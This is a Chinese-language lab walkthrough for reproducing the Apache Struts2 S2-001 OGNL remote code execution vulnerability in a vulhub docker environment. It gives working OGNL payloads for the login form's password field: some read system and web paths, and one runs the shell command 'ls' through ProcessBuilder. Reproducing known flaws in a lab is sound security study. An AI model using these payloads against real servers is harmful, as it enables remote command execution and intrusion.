S2-001 远程代码执行漏洞

S2-001 远程代码执行漏洞

该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行

漏洞环境

我们先下载环境，在github有别人直接搭建好的docker环境我们直接拿来用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/struts2/s2-001/
docker-compose up -d

访问IP:8080即可看到一个登陆界面。

影响版本

Struts 2.0.0 - Struts 2.0.8

漏洞复现

首先在password的地方输入%{1+1} 做测试

点击登陆，发现password解析就证明漏洞存在

在password里输入%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}获取tomcat执行路径

在password输入%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()} 获取Web路径

在password输入%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()} 执行ls命令成功